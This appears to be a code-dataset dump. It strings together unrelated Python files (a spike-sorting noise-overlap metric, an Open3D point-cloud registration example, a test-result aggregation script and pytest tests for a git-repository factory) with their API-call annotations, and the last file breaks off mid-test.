'torch.zeros_like', 'torch.zeros_like', (['param'], {'device': 'device'}), '(param, device=device)\n', (6511, 6533), False, 'import torch\n'), ((6990, 7005), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (7003, 7005), False, 'import torch\n'), ((7308, 7342), 'torch_xla.core.xla_model.rendezvous', 'xm.rendezvous', (['"""params_replicated"""'], {}), "('params_replicated')\n", (7321, 7342), True, 'import torch_xla.core.xla_model as xm\n'), ((7503, 7518), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', 
(7516, 7518), False, 'import torch\n'), ((7623, 7677), 'torch_xla.core.xla_model.all_reduce', 'xm.all_reduce', (['xm.REDUCE_SUM', 'replica_grads'], {'scale': '(1.0)'}), '(xm.REDUCE_SUM, replica_grads, scale=1.0)\n', (7636, 7677), True, 'import torch_xla.core.xla_model as xm\n'), ((8995, 9020), 'multiprocessing.Queue', 'mp.Queue', (['master_prefetch'], {}), '(master_prefetch)\n', (9003, 9020), True, 'import multiprocessing as mp\n'), ((9652, 9667), 'torch_xla.core.xla_model.xla_device', 'xm.xla_device', ([], {}), '()\n', (9665, 9667), True, 'import torch_xla.core.xla_model as xm\n'), ((1856, 1928), 'functools.partial', 'partial', (['xmp.spawn', 'self.runner'], {'nprocs': 'self.nprocs', 'start_method': '"""fork"""'}), "(xmp.spawn, self.runner, nprocs=self.nprocs, start_method='fork')\n", (1863, 1928), False, 'from functools import partial\n'), ((6147, 6170), 'torch.zeros_like', 'torch.zeros_like', (['param'], {}), '(param)\n', (6163, 6170), False, 'import torch\n'), ((6330, 6357), 'copy.deepcopy', 'deepcopy', (['self.master_model'], {}), '(self.master_model)\n', (6338, 6357), False, 'from copy import deepcopy\n'), ((7198, 7213), 'torch_xla.core.xla_model.xla_device', 'xm.xla_device', ([], {}), '()\n', (7211, 7213), True, 'import torch_xla.core.xla_model as xm\n'), ((5160, 5182), 'torch_xla.core.xla_model.is_master_ordinal', 'xm.is_master_ordinal', ([], {}), '()\n', (5180, 5182), True, 'import torch_xla.core.xla_model as xm\n'), ((5188, 5201), 'contextlib.nullcontext', 'nullcontext', ([], {}), '()\n', (5199, 5201), False, 'from contextlib import nullcontext\n'), ((9539, 9555), 'torch_xla.core.xla_model.get_ordinal', 'xm.get_ordinal', ([], {}), '()\n', (9553, 9555), True, 'import torch_xla.core.xla_model as xm\n'), ((4421, 4443), 'torch_xla.core.xla_model.is_master_ordinal', 'xm.is_master_ordinal', ([], {}), '()\n', (4441, 4443), True, 'import torch_xla.core.xla_model as xm\n'), ((4449, 4462), 'contextlib.nullcontext', 'nullcontext', ([], {}), '()\n', (4460, 4462), 
False, 'from contextlib import nullcontext\n'), ((9616, 9631), 'torch_xla.core.xla_model.xla_device', 'xm.xla_device', ([], {}), '()\n', (9629, 9631), True, 'import torch_xla.core.xla_model as xm\n')] |
import numpy as np
from copy import copy
from .utils.thresholdcurator import ThresholdCurator
from .quality_metric import QualityMetric
import spiketoolkit as st
import spikemetrics.metrics as metrics
from spikemetrics.utils import printProgressBar
from collections import OrderedDict
from sklearn.neighbors import NearestNeighbors
from .parameter_dictionaries import update_all_param_dicts_with_kwargs
class NoiseOverlap(QualityMetric):
    """Noise-overlap quality metric.

    For each unit, compares its spike waveforms against "noise" snippets cut
    at random times, and measures how separable the two groups are in PCA
    space using a k-nearest-neighbors match rate. 0 means perfectly
    separable (clean unit); values near 0.5 mean the unit is
    indistinguishable from noise.
    """
    installed = True  # check at class level if installed or not
    installation_mesg = ""  # err
    # default metric parameters (exposed by the toolkit's params mechanism)
    params = OrderedDict([('max_spikes_per_unit_for_noise_overlap', 1000), ('num_features', 10),
                          ('num_knn', 6)])
    curator_name = "ThresholdNoiseOverlaps"
    def __init__(self, metric_data):
        """Initialize the metric; requires a MetricData with an attached recording."""
        QualityMetric.__init__(self, metric_data, metric_name="noise_overlap")
        if not metric_data.has_recording():
            raise ValueError("MetricData object must have a recording")
    def compute_metric(self, max_spikes_per_unit_for_noise_overlap, num_features, num_knn, **kwargs):
        """Compute the noise-overlap value for every unit.

        :param max_spikes_per_unit_for_noise_overlap: cap on waveforms per unit
        :param num_features: number of PCA components used for the kNN comparison
        :param num_knn: number of nearest neighbors per clip
        :return: 1-D np.ndarray with one noise-overlap value per unit
        """
        params_dict = update_all_param_dicts_with_kwargs(kwargs)
        save_property_or_features = params_dict['save_property_or_features']
        seed = params_dict['seed']
        # extract spike-triggered waveform clips for all units
        waveforms = st.postprocessing.get_unit_waveforms(
            self._metric_data._recording,
            self._metric_data._sorting,
            unit_ids=self._metric_data._unit_ids,
            max_spikes_per_unit=max_spikes_per_unit_for_noise_overlap,
            **kwargs
        )
        if seed is not None:
            np.random.seed(seed)
        noise_overlaps = []
        for i_u, unit in enumerate(self._metric_data._unit_ids):
            if self._metric_data.verbose:
                printProgressBar(i_u + 1, len(self._metric_data._unit_ids))
            wfs = waveforms[i_u]
            times = self._metric_data._sorting.get_unit_spike_train(unit_id=unit)
            if len(wfs) > max_spikes_per_unit_for_noise_overlap:
                # NOTE(review): this draws spike *times* (frame indices) and then
                # uses them to index into the waveform array -- that looks like it
                # should be np.random.choice(len(wfs), ...) instead; confirm
                # against upstream before changing, as it alters the metric.
                selecte_idxs = np.random.choice(times, size=max_spikes_per_unit_for_noise_overlap)
                wfs = wfs[selecte_idxs]
            # get clip_size from waveforms shape
            clip_size = wfs.shape[-1]
            num_clips = len(wfs)
            # sample control ("noise") snippet times uniformly over the unit's span
            min_time = np.min(times)
            max_time = np.max(times)
            times_control = np.random.choice(np.arange(min_time, max_time), size=num_clips)
            clips = copy(wfs)
            clips_control = np.stack(self._metric_data._recording.get_snippets(snippet_len=clip_size,
                                                                               reference_frames=times_control))
            # locate the template's peak (channel, sample) -- the unit's signature
            template = np.median(wfs, axis=0)
            max_ind = np.unravel_index(np.argmax(np.abs(template)), template.shape)
            chmax = max_ind[0]
            tmax = max_ind[1]
            max_val = template[chmax, tmax]
            # build a "noise template": control clips weighted by how much they
            # resemble the unit at its peak, rescaled to the template's energy
            weighted_clips_control = np.zeros(clips_control.shape)
            weights = np.zeros(num_clips)
            for j in range(num_clips):
                clip0 = clips_control[j, :, :]
                val0 = clip0[chmax, tmax]
                weight0 = val0 * max_val
                weights[j] = weight0
                weighted_clips_control[j, :, :] = clip0 * weight0
            noise_template = np.sum(weighted_clips_control, axis=0)
            noise_template = noise_template / np.sum(np.abs(noise_template)) * np.sum(np.abs(template))
            # project the noise-template direction out of both groups so the kNN
            # comparison is not dominated by shared background structure
            for j in range(num_clips):
                clips[j, :, :] = _subtract_clip_component(clips[j, :, :], noise_template)
                clips_control[j, :, :] = _subtract_clip_component(clips_control[j, :, :], noise_template)
            all_clips = np.concatenate([clips, clips_control], axis=0)
            num_channels_wfs = all_clips.shape[1]
            num_samples_wfs = all_clips.shape[2]
            all_features = _compute_pca_features(all_clips.reshape((num_clips * 2,
                                                                    num_channels_wfs * num_samples_wfs)), num_features)
            num_all_clips=len(all_clips)
            # kNN in PCA space over spike clips (group 1) and noise clips (group 2)
            distances, indices = NearestNeighbors(n_neighbors=min(num_knn + 1, num_all_clips - 1), algorithm='auto').fit(
                all_features.T).kneighbors()
            group_id = np.zeros((num_clips * 2))
            group_id[0:num_clips] = 1
            group_id[num_clips:] = 2
            # fraction of neighbors (excluding self at k=0) in the same group:
            # high match rate -> groups are separable -> low noise overlap
            num_match = 0
            total = 0
            for j in range(num_clips * 2):
                for k in range(1, min(num_knn + 1, num_all_clips - 1)):
                    ind = indices[j][k]
                    if group_id[j] == group_id[ind]:
                        num_match = num_match + 1
                    total = total + 1
            pct_match = num_match / total
            noise_overlap = 1 - pct_match
            noise_overlaps.append(noise_overlap)
        noise_overlaps = np.asarray(noise_overlaps)
        if save_property_or_features:
            self.save_property_or_features(self._metric_data._sorting, noise_overlaps, self._metric_name)
        return noise_overlaps
    def threshold_metric(self, threshold, threshold_sign, max_spikes_per_unit_for_noise_overlap,
                         num_features, num_knn, **kwargs):
        """Compute the metric and return a curator that drops units past *threshold*."""
        noise_overlaps = self.compute_metric(max_spikes_per_unit_for_noise_overlap, num_features, num_knn, **kwargs)
        threshold_curator = ThresholdCurator(sorting=self._metric_data._sorting, metric=noise_overlaps)
        threshold_curator.threshold_sorting(threshold=threshold, threshold_sign=threshold_sign)
        return threshold_curator
def _compute_pca_features(X, num_components):
u, s, vt = np.linalg.svd(X)
return u[:, :num_components].T
def _subtract_clip_component(clip1, component):
V1 = clip1.flatten()
V2 = component.flatten()
V1 = V1 - np.mean(V1)
V2 = V2 - np.mean(V2)
V1 = V1 - V2 * np.dot(V1, V2) / np.dot(V2, V2)
return V1.reshape(clip1.shape)
| [
"numpy.mean",
"collections.OrderedDict",
"spiketoolkit.postprocessing.get_unit_waveforms",
"numpy.median",
"numpy.abs",
"numpy.random.choice",
"numpy.asarray",
"numpy.max",
"numpy.sum",
"numpy.zeros",
"numpy.dot",
"numpy.random.seed",
"numpy.concatenate",
"numpy.min",
"numpy.linalg.svd",... | [((552, 657), 'collections.OrderedDict', 'OrderedDict', (["[('max_spikes_per_unit_for_noise_overlap', 1000), ('num_features', 10), (\n 'num_knn', 6)]"], {}), "([('max_spikes_per_unit_for_noise_overlap', 1000), (\n 'num_features', 10), ('num_knn', 6)])\n", (563, 657), False, 'from collections import OrderedDict\n'), ((5662, 5678), 'numpy.linalg.svd', 'np.linalg.svd', (['X'], {}), '(X)\n', (5675, 5678), True, 'import numpy as np\n'), ((1258, 1468), 'spiketoolkit.postprocessing.get_unit_waveforms', 'st.postprocessing.get_unit_waveforms', (['self._metric_data._recording', 'self._metric_data._sorting'], {'unit_ids': 'self._metric_data._unit_ids', 'max_spikes_per_unit': 'max_spikes_per_unit_for_noise_overlap'}), '(self._metric_data._recording, self.\n _metric_data._sorting, unit_ids=self._metric_data._unit_ids,\n max_spikes_per_unit=max_spikes_per_unit_for_noise_overlap, **kwargs)\n', (1294, 1468), True, 'import spiketoolkit as st\n'), ((4891, 4917), 'numpy.asarray', 'np.asarray', (['noise_overlaps'], {}), '(noise_overlaps)\n', (4901, 4917), True, 'import numpy as np\n'), ((5832, 5843), 'numpy.mean', 'np.mean', (['V1'], {}), '(V1)\n', (5839, 5843), True, 'import numpy as np\n'), ((5858, 5869), 'numpy.mean', 'np.mean', (['V2'], {}), '(V2)\n', (5865, 5869), True, 'import numpy as np\n'), ((1572, 1592), 'numpy.random.seed', 'np.random.seed', (['seed'], {}), '(seed)\n', (1586, 1592), True, 'import numpy as np\n'), ((2270, 2283), 'numpy.min', 'np.min', (['times'], {}), '(times)\n', (2276, 2283), True, 'import numpy as np\n'), ((2307, 2320), 'numpy.max', 'np.max', (['times'], {}), '(times)\n', (2313, 2320), True, 'import numpy as np\n'), ((2433, 2442), 'copy.copy', 'copy', (['wfs'], {}), '(wfs)\n', (2437, 2442), False, 'from copy import copy\n'), ((2680, 2702), 'numpy.median', 'np.median', (['wfs'], {'axis': '(0)'}), '(wfs, axis=0)\n', (2689, 2702), True, 'import numpy as np\n'), ((2929, 2958), 'numpy.zeros', 'np.zeros', (['clips_control.shape'], {}), 
'(clips_control.shape)\n', (2937, 2958), True, 'import numpy as np\n'), ((2981, 3000), 'numpy.zeros', 'np.zeros', (['num_clips'], {}), '(num_clips)\n', (2989, 3000), True, 'import numpy as np\n'), ((3303, 3341), 'numpy.sum', 'np.sum', (['weighted_clips_control'], {'axis': '(0)'}), '(weighted_clips_control, axis=0)\n', (3309, 3341), True, 'import numpy as np\n'), ((3707, 3753), 'numpy.concatenate', 'np.concatenate', (['[clips, clips_control]'], {'axis': '(0)'}), '([clips, clips_control], axis=0)\n', (3721, 3753), True, 'import numpy as np\n'), ((4288, 4311), 'numpy.zeros', 'np.zeros', (['(num_clips * 2)'], {}), '(num_clips * 2)\n', (4296, 4311), True, 'import numpy as np\n'), ((5906, 5920), 'numpy.dot', 'np.dot', (['V2', 'V2'], {}), '(V2, V2)\n', (5912, 5920), True, 'import numpy as np\n'), ((2017, 2084), 'numpy.random.choice', 'np.random.choice', (['times'], {'size': 'max_spikes_per_unit_for_noise_overlap'}), '(times, size=max_spikes_per_unit_for_noise_overlap)\n', (2033, 2084), True, 'import numpy as np\n'), ((2366, 2395), 'numpy.arange', 'np.arange', (['min_time', 'max_time'], {}), '(min_time, max_time)\n', (2375, 2395), True, 'import numpy as np\n'), ((5889, 5903), 'numpy.dot', 'np.dot', (['V1', 'V2'], {}), '(V1, V2)\n', (5895, 5903), True, 'import numpy as np\n'), ((2752, 2768), 'numpy.abs', 'np.abs', (['template'], {}), '(template)\n', (2758, 2768), True, 'import numpy as np\n'), ((3428, 3444), 'numpy.abs', 'np.abs', (['template'], {}), '(template)\n', (3434, 3444), True, 'import numpy as np\n'), ((3395, 3417), 'numpy.abs', 'np.abs', (['noise_template'], {}), '(noise_template)\n', (3401, 3417), True, 'import numpy as np\n')] |
# Open3D: www.open3d.org
# The MIT License (MIT)
# See license file or visit www.open3d.org for details
# examples/Python/Advanced/global_registration.py
import open3d as o3d
import numpy as np
import copy
def draw_registration_result(source, target, transformation):
    """Visualize *source* aligned onto *target* by the given 4x4 transform.

    Operates on deep copies so the caller's geometries are left untouched.
    """
    aligned_source = copy.deepcopy(source)
    reference_target = copy.deepcopy(target)
    aligned_source.paint_uniform_color([1, 0.706, 0])
    reference_target.paint_uniform_color([0, 0.651, 0.929])
    aligned_source.transform(transformation)
    o3d.visualization.draw_geometries([aligned_source, reference_target])
def preprocess_point_cloud(pcd, voxel_size):
    """Downsample *pcd*, estimate normals, and compute FPFH features.

    Returns (downsampled_cloud, fpfh_features).
    """
    print(":: Downsample with a voxel size %.3f." % voxel_size)
    downsampled = pcd.voxel_down_sample(voxel_size)
    # normals are required by FPFH and by point-to-plane ICP later on
    radius_normal = voxel_size * 2
    print(":: Estimate normal with search radius %.3f." % radius_normal)
    downsampled.estimate_normals(
        o3d.geometry.KDTreeSearchParamHybrid(radius=radius_normal, max_nn=30))
    radius_feature = voxel_size * 5
    print(":: Compute FPFH feature with search radius %.3f." % radius_feature)
    fpfh = o3d.registration.compute_fpfh_feature(
        downsampled,
        o3d.geometry.KDTreeSearchParamHybrid(radius=radius_feature, max_nn=100))
    return downsampled, fpfh
def prepare_dataset(voxel_size):
    """Load the demo point-cloud pair, misalign the source, and preprocess both."""
    print(":: Load two point clouds and disturb initial pose.")
    source = o3d.io.read_point_cloud("../../TestData/ICP/cloud_bin_0.pcd")
    target = o3d.io.read_point_cloud("../../TestData/ICP/cloud_bin_1.pcd")
    # apply a known rigid transform so registration has real work to do
    trans_init = np.asarray([
        [0.0, 0.0, 1.0, 0.0],
        [1.0, 0.0, 0.0, 0.0],
        [0.0, 1.0, 0.0, 0.0],
        [0.0, 0.0, 0.0, 1.0],
    ])
    source.transform(trans_init)
    draw_registration_result(source, target, np.identity(4))
    source_down, source_fpfh = preprocess_point_cloud(source, voxel_size)
    target_down, target_fpfh = preprocess_point_cloud(target, voxel_size)
    return source, target, source_down, target_down, source_fpfh, target_fpfh
def execute_global_registration(source_down, target_down, source_fpfh,
                                target_fpfh, voxel_size):
    """Coarsely align the clouds with RANSAC over FPFH feature matches."""
    distance_threshold = voxel_size * 1.5
    print(":: RANSAC registration on downsampled point clouds.")
    print("   Since the downsampling voxel size is %.3f," % voxel_size)
    print("   we use a liberal distance threshold %.3f." % distance_threshold)
    estimation = o3d.registration.TransformationEstimationPointToPoint(False)
    # prune candidate matches by edge-length consistency and distance
    checkers = [
        o3d.registration.CorrespondenceCheckerBasedOnEdgeLength(0.9),
        o3d.registration.CorrespondenceCheckerBasedOnDistance(
            distance_threshold)
    ]
    criteria = o3d.registration.RANSACConvergenceCriteria(4000000, 500)
    return o3d.registration.registration_ransac_based_on_feature_matching(
        source_down, target_down, source_fpfh, target_fpfh, distance_threshold,
        estimation, 4, checkers, criteria)
def refine_registration(source, target, source_fpfh, target_fpfh, voxel_size,
                        init_transformation=None):
    """Refine a rough alignment with point-to-plane ICP on the full clouds.

    Args:
        init_transformation: optional 4x4 initial alignment.  When omitted it
            falls back to the module-level ``result_ransac.transformation``
            for backward compatibility with the original example script.
    """
    distance_threshold = voxel_size * 0.4
    print(":: Point-to-plane ICP registration is applied on original point")
    print("   clouds to refine the alignment. This time we use a strict")
    print("   distance threshold %.3f." % distance_threshold)
    if init_transformation is None:
        # ROBUSTNESS: the original silently depended on this module-level
        # global; keeping it as a fallback preserves behavior while letting
        # callers pass the initial transform explicitly.
        init_transformation = result_ransac.transformation
    result = o3d.registration.registration_icp(
        source, target, distance_threshold, init_transformation,
        o3d.registration.TransformationEstimationPointToPlane())
    return result
if __name__ == "__main__":
    voxel_size = 0.05  # means 5cm for the dataset
    # load, disturb and preprocess the demo point clouds
    source, target, source_down, target_down, source_fpfh, target_fpfh = \
        prepare_dataset(voxel_size)
    # coarse alignment via feature-based RANSAC on the downsampled clouds.
    # NOTE: refine_registration() reads this module-level `result_ransac`
    # variable, so its name matters.
    result_ransac = execute_global_registration(source_down, target_down,
                                                source_fpfh, target_fpfh,
                                                voxel_size)
    print(result_ransac)
    draw_registration_result(source_down, target_down,
                             result_ransac.transformation)
    # fine alignment via point-to-plane ICP on the full-resolution clouds
    result_icp = refine_registration(source, target, source_fpfh, target_fpfh,
                                     voxel_size)
    print(result_icp)
    draw_registration_result(source, target, result_icp.transformation)
"numpy.identity",
"open3d.registration.TransformationEstimationPointToPlane",
"open3d.registration.CorrespondenceCheckerBasedOnEdgeLength",
"numpy.asarray",
"open3d.geometry.KDTreeSearchParamHybrid",
"open3d.registration.RANSACConvergenceCriteria",
"open3d.visualization.draw_geometries",
"open3d.io.re... | [((290, 311), 'copy.deepcopy', 'copy.deepcopy', (['source'], {}), '(source)\n', (303, 311), False, 'import copy\n'), ((330, 351), 'copy.deepcopy', 'copy.deepcopy', (['target'], {}), '(target)\n', (343, 351), False, 'import copy\n'), ((504, 565), 'open3d.visualization.draw_geometries', 'o3d.visualization.draw_geometries', (['[source_temp, target_temp]'], {}), '([source_temp, target_temp])\n', (537, 565), True, 'import open3d as o3d\n'), ((1356, 1417), 'open3d.io.read_point_cloud', 'o3d.io.read_point_cloud', (['"""../../TestData/ICP/cloud_bin_0.pcd"""'], {}), "('../../TestData/ICP/cloud_bin_0.pcd')\n", (1379, 1417), True, 'import open3d as o3d\n'), ((1431, 1492), 'open3d.io.read_point_cloud', 'o3d.io.read_point_cloud', (['"""../../TestData/ICP/cloud_bin_1.pcd"""'], {}), "('../../TestData/ICP/cloud_bin_1.pcd')\n", (1454, 1492), True, 'import open3d as o3d\n'), ((1510, 1615), 'numpy.asarray', 'np.asarray', (['[[0.0, 0.0, 1.0, 0.0], [1.0, 0.0, 0.0, 0.0], [0.0, 1.0, 0.0, 0.0], [0.0, \n 0.0, 0.0, 1.0]]'], {}), '([[0.0, 0.0, 1.0, 0.0], [1.0, 0.0, 0.0, 0.0], [0.0, 1.0, 0.0, 0.0\n ], [0.0, 0.0, 0.0, 1.0]])\n', (1520, 1615), True, 'import numpy as np\n'), ((874, 943), 'open3d.geometry.KDTreeSearchParamHybrid', 'o3d.geometry.KDTreeSearchParamHybrid', ([], {'radius': 'radius_normal', 'max_nn': '(30)'}), '(radius=radius_normal, max_nn=30)\n', (910, 943), True, 'import open3d as o3d\n'), ((1141, 1212), 'open3d.geometry.KDTreeSearchParamHybrid', 'o3d.geometry.KDTreeSearchParamHybrid', ([], {'radius': 'radius_feature', 'max_nn': '(100)'}), '(radius=radius_feature, max_nn=100)\n', (1177, 1212), True, 'import open3d as o3d\n'), ((1718, 1732), 'numpy.identity', 'np.identity', (['(4)'], {}), '(4)\n', (1729, 1732), True, 'import numpy as np\n'), ((2515, 2575), 'open3d.registration.TransformationEstimationPointToPoint', 'o3d.registration.TransformationEstimationPointToPoint', (['(False)'], {}), '(False)\n', (2568, 2575), True, 'import open3d as o3d\n'), ((2770, 2826), 
'open3d.registration.RANSACConvergenceCriteria', 'o3d.registration.RANSACConvergenceCriteria', (['(4000000)', '(500)'], {}), '(4000000, 500)\n', (2812, 2826), True, 'import open3d as o3d\n'), ((3312, 3367), 'open3d.registration.TransformationEstimationPointToPlane', 'o3d.registration.TransformationEstimationPointToPlane', ([], {}), '()\n', (3365, 3367), True, 'import open3d as o3d\n'), ((2594, 2654), 'open3d.registration.CorrespondenceCheckerBasedOnEdgeLength', 'o3d.registration.CorrespondenceCheckerBasedOnEdgeLength', (['(0.9)'], {}), '(0.9)\n', (2649, 2654), True, 'import open3d as o3d\n'), ((2668, 2741), 'open3d.registration.CorrespondenceCheckerBasedOnDistance', 'o3d.registration.CorrespondenceCheckerBasedOnDistance', (['distance_threshold'], {}), '(distance_threshold)\n', (2721, 2741), True, 'import open3d as o3d\n')] |
import os
import argparse
import pandas as pd
import numpy as np
from sklearn.metrics import f1_score, r2_score
from tqdm import tqdm
# Aggregate per-batch test-result CSVs for one experiment/epoch, score each
# results directory, and report/save the best-scoring run.
parser = argparse.ArgumentParser()
parser.add_argument("--exp_dir", type=str, help="path to directory containing test results",
                    default="/scratch/wdjo224/deep_protein_binding/experiments")
parser.add_argument("--exp_name", type=str, help="name of the experiment to collect results", default="binding_debug")
parser.add_argument("--exp_type", type=str, help="indicate regression (reg) or classification (class)",
                    default="class")
parser.add_argument("--exp_epoch", type=int, help="which epoch to get results for", default=4)
args = parser.parse_args()

test_list = []  # one {"path", "score", "process"} record per matching results dir

print("reading test results...")
for root, dirs, files in tqdm(os.walk(args.exp_dir), total=len(os.listdir(args.exp_dir))):
    # a directory is relevant when it holds test results for the requested
    # experiment name and epoch
    if "test_results" in root and args.exp_name in root and "epoch{}".format(args.exp_epoch) in root:
        # directory naming convention: "<process>_..." -> recover the process id
        process = root.split("/")[-1].split("_")[0]
        # concatenate every per-batch CSV in this directory into one frame
        test_df = pd.DataFrame({"idx": [], "pred": [], "true": [], "loss": []})
        for file in os.listdir(root):
            test_df = pd.concat([test_df, pd.read_csv(root + "/" + file, index_col=0)])
        # predictions/targets are stored as stringified numpy arrays ("[ ... ]")
        if args.exp_type == "class":
            y_true = test_df.true.apply(lambda x: np.argmax(np.fromstring(x.strip("[ ]"), sep=" ", dtype=np.float32)))
            y_pred = test_df.pred.apply(lambda x: np.argmax(np.fromstring(x.strip("[ ]"), sep=" ", dtype=np.float32)))
            score = f1_score(y_pred=y_pred, y_true=y_true)
        elif args.exp_type == "reg":
            y_true = test_df.true.apply(lambda x: np.fromstring(x.strip("[ ]"), sep=" ", dtype=np.float32))
            y_pred = test_df.pred.apply(lambda x: np.fromstring(x.strip("[ ]"), sep=" ", dtype=np.float32))
            score = r2_score(y_pred=y_pred, y_true=y_true)
        else:
            raise Exception("not a valid output type")
        test_list.append({"path": root, "score": score, "process": process})

print("finished reading. finding best result")
# BUGFIX: the original seeded the search with a magic sentinel (-9999999) and
# indexed test_list[0] even when nothing matched, crashing with IndexError.
if not test_list:
    raise SystemExit("no test results found for experiment '{}' epoch {}".format(args.exp_name, args.exp_epoch))
# max() keeps the first occurrence on ties, matching the original strict-">" loop
best_test = max(test_list, key=lambda test: test["score"])

print("best test results:\n score: {} \t process: {} \t path: {}".format(best_test["score"], best_test["process"],
                                                                         best_test["path"]))

pd.DataFrame(test_list).sort_values(by="score", ascending=False).to_csv(
    "/scratch/wdjo224/deep_protein_binding/"+args.exp_name+"_test_results.csv")
| [
"os.listdir",
"sklearn.metrics.f1_score",
"argparse.ArgumentParser",
"pandas.read_csv",
"pandas.DataFrame",
"sklearn.metrics.r2_score",
"os.walk"
] | [((144, 169), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (167, 169), False, 'import argparse\n'), ((845, 866), 'os.walk', 'os.walk', (['args.exp_dir'], {}), '(args.exp_dir)\n', (852, 866), False, 'import os\n'), ((1078, 1139), 'pandas.DataFrame', 'pd.DataFrame', (["{'idx': [], 'pred': [], 'true': [], 'loss': []}"], {}), "({'idx': [], 'pred': [], 'true': [], 'loss': []})\n", (1090, 1139), True, 'import pandas as pd\n'), ((1160, 1176), 'os.listdir', 'os.listdir', (['root'], {}), '(root)\n', (1170, 1176), False, 'import os\n'), ((878, 902), 'os.listdir', 'os.listdir', (['args.exp_dir'], {}), '(args.exp_dir)\n', (888, 902), False, 'import os\n'), ((1583, 1621), 'sklearn.metrics.f1_score', 'f1_score', ([], {'y_pred': 'y_pred', 'y_true': 'y_true'}), '(y_pred=y_pred, y_true=y_true)\n', (1591, 1621), False, 'from sklearn.metrics import f1_score, r2_score\n'), ((1896, 1934), 'sklearn.metrics.r2_score', 'r2_score', ([], {'y_pred': 'y_pred', 'y_true': 'y_true'}), '(y_pred=y_pred, y_true=y_true)\n', (1904, 1934), False, 'from sklearn.metrics import f1_score, r2_score\n'), ((2545, 2568), 'pandas.DataFrame', 'pd.DataFrame', (['test_list'], {}), '(test_list)\n', (2557, 2568), True, 'import pandas as pd\n'), ((1220, 1263), 'pandas.read_csv', 'pd.read_csv', (["(root + '/' + file)"], {'index_col': '(0)'}), "(root + '/' + file, index_col=0)\n", (1231, 1263), True, 'import pandas as pd\n')] |
import os
from contextlib import ExitStack
from pathlib import Path
import pytest
from synctogit.git_factory import GitError, git_factory
def remotes_dump(remote_name, remote):
    """Render the expected output of ``git remote -v`` for a single remote.

    Returns two lines (fetch + push) in the exact format git prints.
    """
    # f-strings instead of the fragile "% locals()" idiom, which silently
    # depends on the parameter names and breaks under any rename.
    return (
        f"{remote_name}\t{remote} (fetch)\n"
        f"{remote_name}\t{remote} (push)"
    )
def test_git_missing_dir(temp_dir):
    """git_factory must refuse to operate on a directory that does not exist."""
    missing_path = str(Path(temp_dir) / "non-existing-dir")
    with pytest.raises(GitError):
        git_factory(missing_path)
@pytest.mark.parametrize(
    "remote_name, remote",
    [
        # fmt: off
        ("origin", None),
        ("angel", "<EMAIL>:KostyaEsmukov/SyncToGit.git"),
        # fmt: on
    ],
)
def test_git_new_existing_empty_dir(call_git, temp_dir, remote_name, remote):
    # Initializing a repo in an existing EMPTY directory must create the repo
    # in-place, make the automated .gitignore commit on the requested branch,
    # and configure the remote when one is given.
    branch = "spooky"
    d = str(Path(temp_dir) / "myrepo")
    os.mkdir(d)
    git_factory(d, branch=branch, remote_name=remote_name, remote=remote)
    git_root = call_git("git rev-parse --show-toplevel", cwd=d)
    assert git_root == d
    # exactly one commit exists: the automated .gitignore commit on HEAD
    git_commits = call_git(r'git log --all --pretty=format:"%D %s" -n 2', cwd=d)
    assert git_commits == (
        "HEAD -> spooky Update .gitignore (automated commit by synctogit)"
    )
    git_branch = call_git("git symbolic-ref --short HEAD", cwd=d)
    assert git_branch == branch
    # the requested branch is the only branch in the repo
    git_branches = call_git(
        "git for-each-ref --format='%(refname:short)' refs/heads/", cwd=d
    )
    assert git_branches == branch
    git_remotes = call_git("git remote -v", cwd=d)
    if remote:
        assert git_remotes == remotes_dump(remote_name, remote)
    else:
        assert git_remotes == ""
def test_git_new_existing_dirty_dir(temp_dir):
    """A pre-existing non-empty directory without git history must be rejected."""
    repo_path = Path(temp_dir) / "myrepo"
    os.mkdir(str(repo_path))
    (repo_path / "file").write_text("")
    # the directory is dirty (untracked file, no repo) -> git_factory must fail
    with pytest.raises(GitError):
        git_factory(str(repo_path))
def test_git_load_existing_empty(call_git, temp_dir):
    """A git repository without any commits must be rejected."""
    repo_dir = str(Path(temp_dir) / "myrepo")
    os.mkdir(repo_dir)
    call_git("git init", cwd=repo_dir)
    # repository exists but has no initial commit yet
    with pytest.raises(GitError):
        git_factory(repo_dir)
@pytest.mark.parametrize(
    "remote_name, remote, shadow_remote",
    [
        ("origin", None, None),
        ("angel", "<EMAIL>:KostyaEsmukov/SyncToGit.git", None),
        ("angel", "<EMAIL>:new/remote.git", "git<EMAIL>:old/remote.git"),
        ("angel", "git<EMAIL>:same/remote.git", "git<EMAIL>:same/remote.git"),
    ],
)
def test_git_load_existing_not_empty(
    call_git, temp_dir, remote_name, remote, shadow_remote
):
    # Loading an existing repo with history must keep that history, append the
    # automated .gitignore commit, and reconcile remotes: a pre-existing
    # ("shadow") remote with a DIFFERENT url must raise GitError; an identical
    # one is accepted.
    p = Path(temp_dir) / "myrepo"
    d = str(p)
    os.mkdir(d)
    with open(str(p / "file"), "wt") as f:
        f.write("")
    call_git("git init", cwd=d)
    call_git("git add .", cwd=d)
    call_git('git commit -m "The Cake is a lie"', cwd=d)
    if shadow_remote:
        # simulate a repo that already has this remote configured
        call_git(f"git remote add {remote_name} {shadow_remote}", cwd=d)
    with ExitStack() as stack:
        if shadow_remote and remote != shadow_remote:
            # conflicting remote url -> git_factory must refuse
            stack.enter_context(pytest.raises(GitError))
        git = git_factory(d, remote_name=remote_name, remote=remote)
    if shadow_remote and remote != shadow_remote:
        return
    assert git.head.commit.summary == (
        "Update .gitignore (automated commit by synctogit)"
    )
    assert git.head.commit.parents[0].summary == "The Cake is a lie"
    git_remotes = call_git("git remote -v", cwd=d)
    if remote:
        assert git_remotes == remotes_dump(remote_name, remote)
    else:
        assert git_remotes == ""
    # asking for a different branch on an already-initialized repo is rejected
    with pytest.raises(GitError):
        git_factory(d, branch="some-other-branch")
def test_git_nested(call_git, temp_dir):
root = Path(temp_dir) / "myroot"
inner = root / "myinner"
os.mkdir(str(root))
call_git("git init", cwd=str(root))
os.mkdir(str(inner))
git_factory(str(inner))
git_root = call_git("git rev-parse --show-toplevel", cwd=str(root))
assert git_root == str(root)
git_root = call_git("git rev-parse --show-toplevel", cwd=str(inner))
assert git_root == str(inner)
@pytest.mark.parametrize("is_up_to_date", [False, True])
def test_gitignore_existing(call_git, temp_dir, is_up_to_date):
p = Path(temp_dir) / "myrepo"
d = str(p)
os.mkdir(d)
gitignore_file = p / ".gitignore"
if is_up_to_date:
